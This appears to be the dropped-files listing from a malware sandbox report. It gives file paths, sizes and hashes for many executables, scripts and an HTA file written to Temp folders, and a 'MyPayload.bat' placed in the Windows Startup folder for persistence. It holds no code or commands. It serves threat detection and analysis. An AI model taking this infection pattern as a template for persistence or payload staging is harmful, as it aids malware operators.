fafcaeb410690fcf64fd35de54150c2f9f45b96de55812309c762e0a336b4aa2

SHA512
9bffd6911c9071dd70bc4366655f2370e754274f11c2e92a9ac2f760f316174a0af4e01ddb6f071816fdcad4bb00ff49915fb18fde7ee2dabb953a29e87d29e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1df5b647-241b-4539-a6f0-f29ca6789c67.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6976fb4e44c462b750015fc6a78da1be

SHA1
35405071925fde1abfd637f935d5a2518e00dc88

SHA256
a13afc9bff802ce3bcc437bb5779d29f6cfd2f7f988e6882943d9f11bfe47692

SHA512
ef8f802e6291c744739437bbee6cf67e3530b3dbe4fc3c7e7563de5c2cf6f945f0eb1648e640e371b29927e1ae5ff76eb691659f0aad510a6a42fc4cd32d12eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AZ1RNKT0\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VWBOIGFN\dll[1]

Filesize
236KB

MD5
2ecb51ab00c5f340380ecf849291dbcf

SHA1
1a4dffbce2a4ce65495ed79eab42a4da3b660931

SHA256
f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf

SHA512
e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VWBOIGFN\soft[2]

Filesize
987KB

MD5
f49d1aaae28b92052e997480c504aa3b

SHA1
a422f6403847405cee6068f3394bb151d8591fb5

SHA256
81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

SHA512
41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
bac2f141d021a3b0408701f2cc1de255

SHA1
61afa8f56f807e3d944948d8caf05d03270e28d0

SHA256
7aafbdc5717b0cc74db058d1b3f8650377425fae9b7565bf6b6e75ac6d89d25f

SHA512
81379874386f63205ca44cda12315e2df155e02eed0a30da026ef34755e84a02f7a05bf5eab1542adbbd9a332040846597901e73a0ad6f80e76a35ad1bd5b7fd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json

Filesize
28KB

MD5
0c00283145eea567f625e2432bf809ad

SHA1
755b7b76b61fdd9446e9e9bf88b8cc58420314dc

SHA256
4b4210ae3dacc2b5980f028925f51f755a4cf64376884790433492f57f95e492

SHA512
2956bbe5f636a99070c45fa98cbf5f45dda349a5cd74784962252b813677456f743f4ffae53d5c502d0166601e6e8f23ff1fc632cd181fcedaf087c188a70228

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\activity-stream.discovery_stream.json.tmp

Filesize
21KB

MD5
b8b1f5cb87b8e3e36c8463522c1ce601

SHA1
8b0ba10c53fb9001e0527ad27700883481206b7b

SHA256
11af23fb99d0a06bbf90fb8f41b6e44a4a5d9c01e293e1836a839a26c977843b

SHA512
835854f41734725cdf45bc1384a2b7c53b4dfdf179d70843ef12630966269d6b6b43af1ecd545c12ffcc22ed7e0b7ad1a2e18a087136e856d3bf7b35f2a5d2bd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

Filesize
13KB

MD5
9d6fc6ad32d1ccc88a98e07430d22499

SHA1
d4be54b29a2bf4b1363b70e245754638c92532e5

SHA256
54315b7eacc055219a68720d99513df544695cf412a4e6d4c930ad224f09a7b6

SHA512
4b3a26c2d9131b302d757508f89d85ccdb9b11405dd57dffbc6e236ae45cb780b60a470d81c6a236725c1c636c5a7d4dc004755e0f30c7552ab2203c9cb9d878

Download Submit
C:\Users\Admin\AppData\Local\Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE

Filesize
2.0MB

MD5
20804890273fa0387262be080ed29b18

SHA1
daa8c33e3bb0fd2e9e110e51add443e1c22cd1f3

SHA256
5bdefb9f7366ddf3b5d7002cc9cee37ec0bbfddc76ea28d5d667e4563f3c92c0

SHA512
1e871a66b28999f7e35fa226ad4b544f3b42b1385125c10ffa63533075761a6563b258be9bc5e7c4230a34366cb24945d313b45f0bdef3253c473309296cf149

Download Submit
C:\Users\Admin\AppData\Local\Temp\10006970101\37da4af4b8.exe

Filesize
6.3MB

MD5
d7387bed6645623b67c951ab77f8301a

SHA1
c17bf497353b696c2276ecd317c3b08734c9d7cd

SHA256
a5ece899ac47a206fb07a8bde21da870b738a94af8ddfbefb7bf00549b025020

SHA512
617ccdffadfdfebde18e84b657b8e31480cb9d6c07cf9905c945c6ac0434f6f816a22c158774c4be20e39a60d0041f22a8e935dcebf145af8db5adc9a6f7d10c

Download Submit
C:\Users\Admin\AppData\Local\Temp\10006980101\48ec5f039a.exe

Filesize
3.8MB

MD5
b10b5f683b4826771989ecad4245d9cb

SHA1
e4218b0112eb8681a8a7eb044a02c784ee94ec1d

SHA256
f0de1d7434304945d5c0acee310fd12c93b75248b3cff3be192dcaa275d47924

SHA512
5a8db96cced941ddddb1862aebaaa36637a26823b3c6caf1fa10017fc847ee87df39ebb2c1d8fe7ffa9acb1158c34ad50877fd1322789377d3b111f6e666cc69

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085407001\amnew.exe

Filesize
429KB

MD5
22892b8303fa56f4b584a04c09d508d8

SHA1
e1d65daaf338663006014f7d86eea5aebf142134

SHA256
87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f

SHA512
852dcc1470f33bc601a814f61a37c1f5a10071ff3354f101be0ef9aa5ac62b4433a732d02acd4247c2a1819fef9adef7dd6722ee8eb9e8501bac033eb877c744

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085408001\jROrnzx.exe

Filesize
681KB

MD5
73d3580f306b584416925e7880b11328

SHA1
b610c76f7c5310561e2def5eb78acb72c51fe84f

SHA256
291f2ea4af0020b9d0dcd566e97dd586cb03988ab71272d511f134ac8b1924b7

SHA512
3bae075ef47734d4c27092314dece8846bccaaf0548abf4b8fa718a07a643a7fbe96153d40e4c04783a8711d865b6a4758adc9a93729b70105e4dcd247a3e82f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085409001\qFqSpAp.exe

Filesize
6.1MB

MD5
10575437dabdddad09b7876fd8a7041c

SHA1
de3a284ff38afc9c9ca19773be9cc30f344640dc

SHA256
ccb13d918b0af7ef19e96a4c53901ec60685564aaa3b90feba4e5214f8c5c097

SHA512
acad2043585eeaa328d07bf58d65f0bec165357240f8494a39dc7bed9f755458e2c814bc07101462e4b664fb726617dbf4d816e2b7ffd4dbfa829b44f784e1b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085411001\ace2630f44.exe

Filesize
1.8MB

MD5
99aa6201e755d1588b694e20d14f5be7

SHA1
262386cfc03af31cd7f5e982d71694ebdd1dc5c0

SHA256
9b4b7b76f529f28d2853dc400ea5aba34fc3c2d3a21c1946099fe99d09c13ca3

SHA512
dff8576e986bcc45ef37938a3f6ef10b440300831d55317652a2f323339295f0c93261466eddc6e7d5fc8f44b234b02be978180fa979f0caba1f0d9265452c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085412001\b2212dd3dd.exe

Filesize
1.7MB

MD5
de8f713cdde888c27931ccf5459e30af

SHA1
cabf3a38d0e46970d1b6a3fb1b437ea28fc5f547

SHA256
f8af14d11d5172a058c022612056ad344692a2da4092e178c44b01624b9cb54d

SHA512
1ee4dce6a9d924ca21fd3ff0de7da684ce87756d79e16c554312504819b9e75d799aba82f7bf92b51cb9c6709bc6840f1eed19375a08e607608cf9404fda9727

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085413001\a196afcbb6.exe

Filesize
948KB

MD5
06ac4093862e3e79327370a96506b7ff

SHA1
959e6de55032fef68df9cb7729e4d4609cf9111e

SHA256
14a898a5e7332388e53f0ed5613fbc79374ba08c165774691e3466e0cf2564d8

SHA512
9bd4c8352ab23c6b11ea9eaedc6d22fc661805291c9d53ce722c3a684bed83e75364689751d1b355c684524b1c8c88461910c1bf154e635fc93f8dd8b8db6558

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085414001\00610290ee.exe

Filesize
938KB

MD5
2d2bf972a244310136caaff3efb4c328

SHA1
b82e7cd10f61db06ecde9cc2b5dd899332bb4a9f

SHA256
18f5c83ae00712792fc2f6ce7f624bf6db9ee0843c08c6bdec2ec1c742d99b6c

SHA512
b8d5ab43658139e1c166c4d20e710855d6b63a12c3e439058cbcf0e7248ed690de8c74b3aed5ec72cf9aefffc2ba66cd8552cd11077235f99886c13976d8f0fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085415001\Bjkm5hE.exe

Filesize
345KB

MD5
5a30bd32da3d78bf2e52fa3c17681ea8

SHA1
a2a3594420e586f2432a5442767a3881ebbb1fca

SHA256
4287dfb79a5b2caa651649343e65cdd15c440d67e006c707a68e6a49697f9f33

SHA512
0e88a0e07053d7358dc3a57e8d1781a4ab47f166d5d1d8a9463c0ca9392f3aba259a4cd18adffd1b83b6778d7a8296625701846af23383abea24e266d504c634

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085416001\d2YQIJa.exe

Filesize
2.0MB

MD5
a6fb59a11bd7f2fa8008847ebe9389de

SHA1
b525ced45f9d2a0664f0823178e0ea973dd95a8f

SHA256
01c4b72f4deaa634023dbc20a083923657e578651ef1147991417c26e8fae316

SHA512
f6d302afa1596397a04b14e7f8d843651bd72df23ee119b494144c828fa371497f043534f60ae5908bc061b593132617264b9d1ea4735dccd971abb135b74c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085417001\DTQCxXZ.exe

Filesize
334KB

MD5
d29f7e1b35faf20ce60e4ce9730dab49

SHA1
6beb535c5dc8f9518c656015c8c22d733339a2b6

SHA256
e6a4ff786a627dd0b763ccfc8922d2f29b55d9e2f3aa7d1ea9452394a69b9f40

SHA512
59d458b6ad32f7de04a85139c5a0351dd39fc0b59472988417ca20ba8ed6cb1d3d5206640d728b092f8460a5f79c0ab5cc73225fba70f8b62798ffd28ed89f1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085418001\bea16bd486.exe

Filesize
4.0MB

MD5
829a0bfc46aa576328fe84fec952d8c8

SHA1
a557d2bc5dd58c3cdec0c0da7bd985ba31185237

SHA256
7929208731296daacaaa861cbfceaf00cb7570385d6e401644d0b85cc585bfb0

SHA512
620910bd8cbd2cce07eb3e2240958bcb0a54575c4f0d410d8fe2f92ec3c2dff2b787a76aa2465c8759ae58903a3cb7c69062814840d02e1c70273c97ee48a15b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085419001\Ta3ZyUR.exe

Filesize
337KB

MD5
d22717aeab82b39d20ee5a5c400246f9

SHA1
4ea623a57a2f3e78914af8c0d450404d9f4df573

SHA256
13224cbe84fe8010fe8ffab6bf8504e1b1671810fb9ea031b57a9047bb8da830

SHA512
92dd0622dbe0b9fd246bc738f9436029194c52efdfd7d7900168e25edaa5578805c1781a64b969ca505ad592a94b0f315f64f05c405c0899f0a5b4946b13f0b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085420001\8d61319260.exe

Filesize
2.0MB

MD5
165fa5fab9793950b2edc0bf1ea8495a

SHA1
b2d2e755081bb320ce816eb4a48f45438137b0f0

SHA256
a9b9e98c097eac4660dc2c2aff034facbd11ad1281d849543388a6d4a1901886

SHA512
80ca3cdfea69af06c4a6c889df286cf4bfaface1a5021a9cc9e609706f1e5a1c747b36eaae54e03285a73e0cf62fe9d468271f85ef0fb7326e107506d29899cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085421041\tYliuwV.ps1

Filesize
881KB

MD5
2b6ab9752e0a268f3d90f1f985541b43

SHA1
49e5dfd9b9672bb98f7ffc740af22833bd0eb680

SHA256
da3b1ac39de4a77b643a4e1c03fc793bad1b66bfd8624630de173004857972df

SHA512
130879c67bfcea3a9fe553342f672d70409fe3db8466c3a28ba98400b04243ebf790b2cf7e4d08ca3034fd370d884f9cbdd31de6b5309e9e6a4364d3152b3ace

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085422001\7aencsM.exe

Filesize
272KB

MD5
661d0730b1f141175184a531c770774a

SHA1
20c72d2defc7a6daf3d560c9cf9ffa28b918607f

SHA256
245ebf8a9cce288dd978f1bfe3b6f2a1a585f9d8e4760aeea73089635607b252

SHA512
ddeab12ed8d11e240079a477046432b6dba804cca09726e1e26d11b4cead60e4b0bdafaa6683ec824855a6bf1ca714552ffcacb3eda4809b9da5e3c4be2a53f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085423001\xclient.exe

Filesize
6KB

MD5
307dca9c775906b8de45869cabe98fcd

SHA1
2b80c3a2fd4a235b2cc9f89315a554d0721c0dd1

SHA256
8437bd0ef46a19c9a7c294c53e0429b40e76ebbd5fe9fd73a9025752495ddb1c

SHA512
80c03f7add3a33a5df7b1f1665253283550dac484d26339ecd85672fb506dce44bd0bf96275d5c41a2e7369c3b604de377b7f5985d7d0d76c7ac663d60a67a1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085424001\08228ffca5.exe

Filesize
1.7MB

MD5
f662cb18e04cc62863751b672570bd7d

SHA1
1630d460c4ca5061d1d10ecdfd9a3c7d85b30896

SHA256
1e9ff1fc659f304a408cff60895ef815d0a9d669a3d462e0046f55c8c6feafc2

SHA512
ce51435c8fb272e40c323f03e8bb6dfa92d89c97bf1e26dc960b7cab6642c2e4bc4804660d0adac61e3b77c46bca056f6d53bedabcbeb3be5b6151bf61cee8f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1085425001\ba087850fc.exe

Filesize
1.7MB

MD5
1fd191af749310fe78308e1026de83b4

SHA1
d0ff5fd0b80a18efee4c95e1db6ef4a856dbef00

SHA256
1e7ef370695a4d88b5d12dfdbf7c9193101159a6dbf27c703ffb0abfb097ea19

SHA512
afe56f8390aabae95ed36e6fdf1bc691e4d54748bdf2817b9fb00175c970c8d7df16f94041e06062bf791e403e6ff612b5fb09434ba86c643a8c994530f5c338

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wl08JKkUA.hta

Filesize
720B

MD5
ec3ae4d55ba03ebcb266587bd2655de7

SHA1
49ca3f4b35affe3d7d79d5234214e6dc1e20d751

SHA256
985c4e092058e10e575ce1fd6218757d43ac3bd1ddf5fc09f1164865bc17696e

SHA512
c7a6664107292978688d23ff002d7f44dbac83cc93eeb77d557647f8a4fc9c709358823f2c198c01fb07c7ca6ca4684b4193650a20ac6f6f679999a93f6c6b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mecqyp0f.bme.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Filesize
2.0MB

MD5
da013399e13811ab7a5f1ea197773829

SHA1
91ad2313b83426686c4594c02ccbe97b92e714fe

SHA256
22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0

SHA512
f84c24a857a6a874e25d132ffebdd22443e8149424f961ea604812f7004a63705e970c4c22cb488baa5bd47b34215142a36eef47159129dcaf66a0de219c55fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF215.tmp

Filesize
547KB

MD5
88502dc8190b25e921bf95d1067eca0f

SHA1
413125080c850b49e944a0aba757c4ef58bde864

SHA256
7b42deb9e98c741d9c889c151c43047851ad5ecc55da43c3dad112a3dafd1e12

SHA512
9eda329dce9ae240a8c27613b146437539fc7c80836240b4c104115a2e48dc8a19cfa47cec014b362e91ab89e53d2c46b2b686795a230a3b9ef0997d81947207

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF21D.tmp

Filesize
10KB

MD5
f6d9a1be3b47d0a144458461c66a544d

SHA1
e5506bbb31d54d9ddcdcbc40b1c2082aa5785741

SHA256
d1e79b6bc234f160a4c6cca4948ffc00bb578f3f823765aebde2fb1197740f9d

SHA512
f06b19fa087fdfc781056f57b98e1d00edc5f8fb75bdde32a6256d3b2c1bc744918c05ecfa36ac04217596f231b1e757a85a2f7a8001148364da1642dcd8c89f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF249.tmp

Filesize
11KB

MD5
ff706417f0b439b99270cc014aac9e7f

SHA1
1d2b0c981d6366816274e9e0770a08028a62a537

SHA256
653af24af700ffc2e5662c877ae97c55bf3fa2ffa99dde434d43d69071319951

SHA512
54c418b0fbbe9b78ad7d3dcca41ff67bc41ad19498e04fd7ae75f961475372bcd6cea7d5af25e028cb7eefc524263a501f6b264cfb2d5ed81a64387568ef0b73

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF24D.tmp

Filesize
431KB

MD5
c73d4c73097b6f5cc4efbaebdfa00255

SHA1
3c28a7f8aa808fccd229f62a8e45c5e662a1f37b

SHA256
5e3a30dcfe0742821a1a833ecd65aeecfbe20e0e8fcb615f8b6d60e2582501da

SHA512
d3f948af487236aa38c531d8b746141612f0dce2c0c00de3bc6d478c8151d2e44334d58670a6cbe44ac2db95cef5dd0ed4f866931d894471e966fdc3f93fa2eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF2BA.tmp

Filesize
14KB

MD5
4e1510146d9437e7ed4270189a87762e

SHA1
23b12dccd4c14de5c11fee798cd106fbb70a8a36

SHA256
65abde7c0278acb6662ca0ef479f275100f8066fe3fd1fdc89bce8ce4cbf5855

SHA512
cf12234fa1baab9432d0d598c3fc1da7fc0f71c9a55bf548c59086d14e70a4069e6ef39c883a5ffc356386d6f8b422d67506d1d3bcde78538fde4c331ea3f6e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF2CB.tmp

Filesize
529KB

MD5
aa4164cbd6fcbe7772b2b472d97f03a5

SHA1
7ec6f1b3506f8c08acea1e8c9018440778cd071f

SHA256
ecb85b30c501af0f3d7aad90d7e7dc7d33d1595367927448c9f64b5a3c1ecc3a

SHA512
b9745b29e02bab828dc8a031215db7038fd66b53f919073b39670c3de314d645c1d508d5305b53e90e174d9e9123a4ae7f33f61e5e6d4d396ad12ef049b0060f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF2CC.tmp

Filesize
1.1MB

MD5
98f09eb380855cee96895bb4bc9b517f

SHA1
bc305eb741a8b8e6136234a0c8820afbc56313ec

SHA256
ebfb78259343519de646c14dc8fc0a85e03c85c42904c08d4514fc40d3ac7efe

SHA512
b3269b3aaf8a4c6e25eb5a59c6d53fac25e6b3c8d9209ee90d0ddf667e5ba32cf553075db5962cbdc4bcdb339cc7f9a91e6a6a24a726cafd8a1caf951ca96c0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF89B.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8B1.tmp

Filesize
114KB

MD5
777045764e460e37b6be974efa507ba8

SHA1
0301822aed02f42bee1668be2a58d4e47b1786af

SHA256
e5eff7f20dc1d3b95fa70330e2962c0ce3fce442a928c3090ccb81005457cb0f

SHA512
a7632f0928250ffb6bd52bbbe829042fd5146869da8de7c5879584d2316c43fb6b938cc05941c4969503bfaccdec4474d56a6f7f6a871439019dc387b1ff9209

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8DC.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8F2.tmp

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8F8.tmp

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF913.tmp

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-2

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

Filesize
330KB

MD5
aee2a2249e20bc880ea2e174c627a826

SHA1
aa87ed4403e676ce4f4199e3f9142aeba43b26d9

SHA256
4d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c

SHA512
4e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin

Filesize
8KB

MD5
591b042212a3d496f3cb316121f3bd73

SHA1
02c6a5c85011e6ab241ee3b65b571237f6d0d00d

SHA256
301f27b663aa06e0386ebf07aad6ce07a00b01c37d698378377a64caec7095b9

SHA512
69bbd827c1b2481100b6671e7bc2601aa7727a0b4c85318a84e5c187f0912ba62dfc285522debb5ed685b8eb646b07776b49bab2b4a1c4f60bbe1c053010fb45

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin

Filesize
13KB

MD5
2340daca79307737e87b3dd9ed0f8d34

SHA1
6375e96c609ba98194cfdc29298a188439d192c5

SHA256
fcb99f2b21258b10f9a0896037dfa957b069f1519b8334655a8d2dc0ac9e0d44

SHA512
2802bef7976a2e4bd7493040bc0ca345a36c0a3149d9232105a35a1a47b7d2dc95aa9c0c859e8a2039aa9561b37b6a1f0d0b6476a9e9adf2bdc6176eb5d1383e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
22434968631333636c0bf61e767ecf84

SHA1
9e5907dfb11470c4ea140a9102316d3d38610177

SHA256
1f97c3ca6fc134cce055ff36d340dccbe68b4b7ae4055e796da00b5920df8278

SHA512
2e2e426fa022d4fee17d483f881fbacfed2bc6ab31af1d0d9af1b3d835ff0e987a05179de5359dce900698bae5b726a19ccb9699ae8de9c271fe4ba652bab774

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
27KB

MD5
34a2fc51e2093fd2b0ab5b0910c378c5

SHA1
d724763a4804dc60e126f41770c83879e2373f4b

SHA256
cf128635f0b0bff3417e146d8519444ab2d3c8a2ba3eaff46a002dce01031f49

SHA512
4efa7c6a11507030154e6a91a1f7d53cafa3c446278691510b3c529accc91780a2d2f51350413ebcf8d4a817d43c4311fb623c66f64c45500f23ec8f57d85747

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
e2e69291661e18965b6f12ca13c0e919

SHA1
12889adf99f9862b37c94f179c274f9b13266ddb

SHA256
7cdeeedd8bac116349168743eedc71c4c8505fa6b1d1e0d55ecd1f87b3dad1e4

SHA512
f31e905c104441cd328d901ff7b61c947d94924c7257d7c9932c94601047c822dbc3472bbd7df2c9504de521bb364d8c0303d2f4d639e71ef0ad454891622033

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\309d0367-526a-4341-ad6c-e3461ba069d5

Filesize
982B

MD5
84e98f38cc07c289e45c0ddc7c6cacd4

SHA1
09b4ad0f803d4da4c9afdb2ca7663e090db6fa9f

SHA256
7140ef475bdc2ba86d38937a1a9d4644b4ca52d6c96ff2c579ab63673cb0dab1

SHA512
a06265bd9b84bf490832db3a281b8908271b258695012a2aa07fad591007da4ca5969138d00360a7bc58536175389d3926610b8fc13cbb525bdb47cba1125352

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\82102f7d-4d64-4a32-a542-8519e8584590

Filesize
671B

MD5
e0edfbdc270c85e6b278465e850564d6

SHA1
354f0dfabb623a1e215663b3d767eb8c458ec2a6

SHA256
182b7e566f18c7a64c1989f5a976d395230fc3507ad5ef190da6233565cfd2c9

SHA512
a47b6f30fcd616d97e7a996e646a41af42076e23b651004e5cc477565bf18db26f5156ee78ead84dbcbc82ed8d690d6ae3b72ec6502af3c908d2fd4c23372c39

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\f5224f44-c967-4782-85f6-573f435c98d0

Filesize
26KB

MD5
918970742384a5470a49ea045830b285

SHA1
30ce23542b936917b8bc4ba072ffaf9a26af8365

SHA256
a04c6e707238eb797c5f91c2bd8c9dcb8963d065bc732ec92fc37f086f7b366d

SHA512
2292ef49ef6e0180501ea45c3a5de158c27e5304a4fd3106d7d816d101d2baf993106ebdb49414501b4e319b9d7c3f947c8663bd1a70214004303870444e5f52

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll.tmp

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
